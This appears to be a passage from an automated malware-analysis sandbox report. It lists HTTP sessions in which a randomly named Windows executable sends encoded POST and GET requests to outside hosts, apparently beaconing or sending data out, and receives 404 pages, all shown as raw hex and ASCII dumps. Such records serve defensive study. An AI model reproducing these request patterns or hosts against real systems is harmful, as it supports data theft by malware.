baL0D+{`.I)i9s2J8W)y1OEdi6~gErFqQAidf$2i?FQV0SSwBg&LN7^jI?C?ey0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	62387	188.114.97.3	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:11.093704939 CEST	1805	OUT	POST /x06k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.exporationgenius.sbs Origin: http://www.exporationgenius.sbs Referer: http://www.exporationgenius.sbs/x06k/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 65 39 43 4e 50 6d 4c 78 45 4c 4d 45 43 4b 66 30 45 30 35 57 49 47 39 70 42 73 72 64 55 72 48 4b 76 68 73 33 76 31 62 46 4f 41 55 42 49 53 6a 49 2f 6b 70 52 6d 6c 62 43 72 68 54 6a 79 78 4a 64 5a 32 75 68 4b 53 55 34 34 32 6d 78 4c 30 4b 53 55 65 39 6f 5a 49 32 73 6a 50 5a 59 70 6d 41 6a 35 50 70 43 38 70 4c 6d 77 33 4d 63 4d 5a 4d 69 35 62 6b 6b 6d 48 6c 6d 36 75 4d 34 31 39 4b 66 30 73 62 68 79 67 76 53 58 35 54 73 42 35 71 61 76 44 61 63 4f 67 31 74 45 4d 4c 47 38 54 48 51 67 70 6b 50 59 72 61 30 36 39 49 6d 53 4e 49 59 46 71 6a 4c 55 51 54 41 64 54 2b 52 4c 31 55 4f 4b 56 62 6f 52 36 45 2f 68 6f 58 47 63 6a 33 45 34 6a 56 46 4c 32 61 30 4e 36 43 54 6c 6e 50 39 77 4c 58 6e 4d 46 48 6c 6d 53 67 58 33 76 48 65 45 58 49 50 57 65 52 74 58 4b 37 39 56 31 6b 79 77 55 57 64 36 7a 37 2b 70 55 75 31 35 6b 48 52 48 41 63 4a 32 51 65 6a 47 4e 7a 72 63 6c 76 6b 35 55 57 4b 48 37 6c 41 33 48 44 4b 50 46 77 7a 70 73 4d 6a 55 52 65 38 37 7a 4e 39 63 68 49 56 74 67 45 63 74 32 66 77 67 71 44 54 2b [TRUNCATED] Data Ascii: 9Fjx=e9CNPmLxELMECKf0E05WIG9pBsrdUrHKvhs3v1bFOAUBISjI/kpRmlbCrhTjyxJdZ2uhKSU442mxL0KSUe9oZI2sjPZYpmAj5PpC8pLmw3McMZMi5bkkmHlm6uM419Kf0sbhygvSX5TsB5qavDacOg1tEMLG8THQgpkPYra069ImSNIYFqjLUQTAdT+RL1UOKVboR6E/hoXGcj3E4jVFL2a0N6CTlnP9wLXnMFHlmSgX3vHeEXIPWeRtXK79V1kywUWd6z7+pUu15kHRHAcJ2QejGNzrclvk5UWKH7lA3HDKPFwzpsMjURe87zN9chIVtgEct2fwgqDT+DLpki+k/twTeH61WKrO6UECEpMj1oHSWSguNbAaQWp7s9ifSU8zQTyVX7RL1DQw4FvU9G9WxaARXMEAMcoHsjKto2VAWsqEs8VQsQGrpzNakTRSAwwxa7BzsP4FK9fpIGKPqjXRH8ZwvGypWKGGp0I4reBQfoQFvRyt/5mGVOl7GbEYpt6OqGvVgwmrwhrmE71VpiqSJcRLVtBhSm2jB7xQsdS4R0oB9DdkKDNNPAKvThQ11Z/F9dvPhzsNHbuar7m65oaEcI0Saqt8P2kQkYigUWdUmDFOiIwvmuGJCBOZY1NVAKVdTlqrHcw7WC5C5GRjFgEpXBd7vKRus18LckbhMSSp+Qs/X7tuL3XHBLTmJp7qYgfqyDDBYXdiz0jLTaFrCvbdS9maop1sGga+bpF5K2xYOZz8iErGUqvHNknRKpshP2DaT5zHRVA9h8CPnH9htgly4DRO2yhqq9hXhUqYdtuB84kFwaTogJq1ThAds/dh0n31j+yiXxoyNATdjDWTYocrkujZayJiXMI0deMS+hru+xjuPkjJobOyCHcNsI3xZfRnkTB8jFCU5OgcT27VpCulgxo+hnOX0XXcWv0sUYpbybpAJkHhr18lfm9Yok0ywYnMLRmD5IdyfZ6E/vwkPio70oK3f5HOTHpud+Bju0HKClgbRAG [TRUNCATED]
Jul 27, 2024 08:06:11.703470945 CEST	821	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:11 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4v7V%2BJzgNUiKtCRsBpPzoG0T6kPVeKCmm27zK41h9Pbp45v1DAFco4vzHFPKU3w%2B3Ebe83N6N6xr38OCqDQcMFB4TWJJ1GPmQ8pmKr6NFYHwXvYPmqtuFqO%2FNPB0SyW6wFz6GUqtTzX2oo0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a7129b91ec47a-EWR Content-Encoding: gzip alt-svc: h2=":443"; ma=60 Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e cb 0e 82 30 14 44 f7 fd 8a 2b 7b b9 60 88 ab 9b 2e e4 11 49 10 89 29 0b 97 9a d6 94 88 14 69 f1 f1 f7 06 d8 b8 9d 39 73 32 b4 4a 8e b1 38 57 29 ec c5 a1 80 aa de 15 79 0c de 1a 31 4f 45 86 98 88 64 69 36 7e 80 98 96 1e 67 a4 dd a3 e5 a4 d5 45 72 46 ae 71 ad e2 51 10 41 69 1c 64 66 ec 24 e1 12 32 c2 19 a2 ab 91 df 69 17 f2 3f 46 87 9c 51 cf 85 56 30 a8 e7 a8 ac 53 12 ea 53 01 f8 09 b6 77 84 f7 c5 42 67 1c dc 26 1c 4c 07 4e 37 16 ac 1a 5e 6a f0 09 fb 49 3f 8b 09 e7 43 3f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 82 ac 65 79 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afL0D+{`.I)i9s2J8W)y1OEdi6~gErFqQAidf$2i?FQV0SSwBg&LN7^jI?C?bey0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	62388	188.114.97.3	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:13.731338978 CEST	492	OUT	GET /x06k/?9Fjx=T/qtMR3LKa4LTbjyNUJlNW8HBO2mLr7NkQwOkzuXYGM8AEnHwE1BuDDgjz7zxChee1OBLSwV/HnzTXSDWu5qS8SxudlejhZ2wNFZ4/rc81wcJeYkmogq71U2jvAp6KKDndns21g=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.exporationgenius.sbs User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:06:14.361712933 CEST	811	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:14 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McxfqgrppB%2BBokbwDB1JgvT25Kb4uEajoVzWQqpop4xf%2F%2F9OoXJE2KFy0hbwEVp7YpDDLQctmsWbLsO3BpfL8BmWAy240bWZyn67IL5oWvoAmUXSOa0JD9J2%2FuG9GSHneL62SozRijcf7a4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a713a6b0732d9-EWR alt-svc: h2=":443"; ma=60 Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 36 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x06k/ was not found on this server.</p></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	62389	157.7.107.37	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:20.255100965 CEST	750	OUT	POST /iczo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.zocalo-fuk.com Origin: http://www.zocalo-fuk.com Referer: http://www.zocalo-fuk.com/iczo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 45 61 54 44 75 76 75 4d 77 55 42 4a 78 57 35 6b 31 54 65 51 68 48 52 44 77 55 48 46 45 6f 33 33 67 68 4c 53 36 6b 70 32 50 63 6f 43 67 38 49 63 67 4c 48 30 38 4b 57 64 39 53 68 35 4c 72 32 73 35 74 4d 61 4c 76 46 51 7a 77 6f 5a 74 6e 33 43 41 35 32 6d 64 38 52 6d 72 49 4f 52 72 68 66 59 50 72 75 55 30 75 59 78 46 52 74 59 37 4c 33 4c 6d 2b 69 2f 69 6f 58 2f 63 56 30 36 6b 4a 57 5a 51 4a 48 34 79 42 66 50 52 62 6d 43 78 42 72 4b 73 38 38 64 72 37 79 79 43 65 54 59 4f 75 58 66 65 61 6c 53 38 4e 70 75 5a 4f 59 76 6a 6b 70 46 71 76 52 46 75 66 45 48 46 30 44 45 68 4d 7a 52 54 76 73 42 63 44 2f 6f 61 59 64 31 Data Ascii: 9Fjx=EaTDuvuMwUBJxW5k1TeQhHRDwUHFEo33ghLS6kp2PcoCg8IcgLH08KWd9Sh5Lr2s5tMaLvFQzwoZtn3CA52md8RmrIORrhfYPruU0uYxFRtY7L3Lm+i/ioX/cV06kJWZQJH4yBfPRbmCxBrKs88dr7yyCeTYOuXfealS8NpuZOYvjkpFqvRFufEHF0DEhMzRTvsBcD/oaYd1
Jul 27, 2024 08:06:21.035975933 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:20 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jul 27, 2024 08:06:21.036005020 CEST	1236	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
Jul 27, 2024 08:06:21.036020994 CEST	1236	IN	Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
Jul 27, 2024 08:06:21.036036968 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
Jul 27, 2024 08:06:21.036055088 CEST	1236	IN	Data Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
Jul 27, 2024 08:06:21.036068916 CEST	1236	IN	Data Raw: 2e 31 36 31 20 30 2d 31 2e 39 20 30 2d 33 2e 38 35 33 2d 2e 35 38 34 2d 34 2e 34 32 35 2d 2e 34 34 37 2d 2e 32 38 2d 2e 39 37 38 2d 2e 33 39 32 2d 31 2e 35 2d 2e 33 31 36 6c 2e 30 30 32 2d 2e 30 30 32 7a 6d 35 37 2e 33 2e 32 34 31 63 2d 2e 34 38 Data Ascii: .161 0-1.9 0-3.853-.584-4.425-.447-.28-.978-.392-1.5-.316l.002-.002zm57.3.241c-.488-.051-.979.066-1.392.331-.6.557-.614 2.528-.629 4.425 0 .993 0 2.062-.09 3.161-.037 1.055-.147 2.106-.329 3.146-.239 1.881-.479 3.823 0 4.515.514.396 1.153.594
Jul 27, 2024 08:06:21.036084890 CEST	1236	IN	Data Raw: 33 34 20 30 20 32 30 2e 34 38 36 2d 38 2e 30 33 37 20 32 35 2e 30 35 31 2d 31 39 2e 34 31 35 2e 38 38 31 2e 34 32 32 20 31 2e 38 33 37 2e 36 36 32 20 32 2e 38 31 33 2e 37 30 37 68 2e 37 33 33 63 32 2e 35 37 36 2e 31 34 32 20 35 2e 30 30 36 2d 31 Data Ascii: 34 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201 6.255-3.458 1.144-2.399 1.746-5.019 1.766-7.676.265-2.556-.016-5.139-.823-7.578zm-62.16 14.494c-.516.39-1.154.583-1.8.542-1.444.307-2.918-.373-3.621-1.671-.
Jul 27, 2024 08:06:21.036102057 CEST	108	IN	Data Raw: 33 30 2e 33 35 37 20 32 34 2e 30 36 33 20 33 30 2e 34 68 2e 31 35 63 31 33 2e 30 37 39 20 30 20 32 34 2e 31 38 33 2d 31 33 2e 38 20 32 34 2e 32 34 32 2d 33 30 2e 31 39 31 2e 30 31 33 2d 34 2e 33 38 37 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 Data Ascii: 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-
Jul 27, 2024 08:06:21.036115885 CEST	1236	IN	Data Raw: 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 33 39 2e 32 35 36 20 34 34 2e 36 32 35 63 2d 31 2e 38 20 30 2d 33 2e 32 20 31 2e 37 37 36 2d 33 2e 32 31 37 20 34 Data Ascii: 2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4
Jul 27, 2024 08:06:21.036134005 CEST	1236	IN	Data Raw: 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37 2d 2e 36 37 37 6c 2d 32 2e 33 31 39 2d 32 2e 39 32 63 2d 2e 34 35 35 2d 2e 35 37 39 2d 2e 35 31 34 2d 31 2e 33 37 37 2d 2e Data Ascii: M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l
Jul 27, 2024 08:06:21.041207075 CEST	1236	IN	Data Raw: 38 34 20 31 2e 34 34 38 6c 2d 2e 34 34 37 2e 35 34 32 63 2d 2e 33 33 35 2e 34 31 31 2d 2e 36 37 34 2e 37 38 34 2d 31 20 31 2e 31 34 32 2d 2e 37 34 2e 37 38 39 2d 31 2e 35 33 36 20 31 2e 35 32 34 2d 32 2e 33 38 31 20 32 2e 32 6c 2d 2e 32 37 33 2e Data Ascii: 84 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.224 1.846 1.218.805-.006 1.528-.497 1.829

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	62390	157.7.107.37	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:22.857825041 CEST	774	OUT	POST /iczo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.zocalo-fuk.com Origin: http://www.zocalo-fuk.com Referer: http://www.zocalo-fuk.com/iczo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 45 61 54 44 75 76 75 4d 77 55 42 4a 79 32 70 6b 7a 41 47 51 6d 6e 52 45 73 45 48 46 4f 49 33 7a 67 68 58 53 36 67 35 6d 50 76 4d 43 68 64 34 63 79 65 7a 30 78 71 57 64 33 79 68 34 47 4c 33 67 35 71 45 34 4c 76 35 51 7a 30 41 5a 74 6c 2f 43 41 4b 4f 6c 62 38 52 65 6b 6f 4f 41 30 78 66 59 50 72 75 55 30 76 70 61 46 52 31 59 37 2b 2f 4c 6e 61 4f 38 6f 49 58 34 55 31 30 36 33 5a 57 46 51 4a 48 52 79 41 44 78 52 64 69 43 78 44 7a 4b 73 74 38 61 67 37 79 77 66 4f 53 4b 4b 38 6a 58 47 34 35 52 39 63 46 44 42 2b 63 4d 69 53 6f 66 32 63 52 6d 38 50 6b 46 46 32 62 32 68 73 7a 37 52 76 55 42 4f 55 7a 50 56 73 34 57 50 76 6b 6c 57 2b 5a 67 64 7a 68 4c 6b 6a 6d 35 55 4b 78 67 4b 77 3d 3d Data Ascii: 9Fjx=EaTDuvuMwUBJy2pkzAGQmnREsEHFOI3zghXS6g5mPvMChd4cyez0xqWd3yh4GL3g5qE4Lv5Qz0AZtl/CAKOlb8RekoOA0xfYPruU0vpaFR1Y7+/LnaO8oIX4U1063ZWFQJHRyADxRdiCxDzKst8ag7ywfOSKK8jXG45R9cFDB+cMiSof2cRm8PkFF2b2hsz7RvUBOUzPVs4WPvklW+ZgdzhLkjm5UKxgKw==
Jul 27, 2024 08:06:23.619672060 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:23 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jul 27, 2024 08:06:23.619704962 CEST	1236	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
Jul 27, 2024 08:06:23.619720936 CEST	1236	IN	Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
Jul 27, 2024 08:06:23.619740963 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
Jul 27, 2024 08:06:23.619756937 CEST	896	IN	Data Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
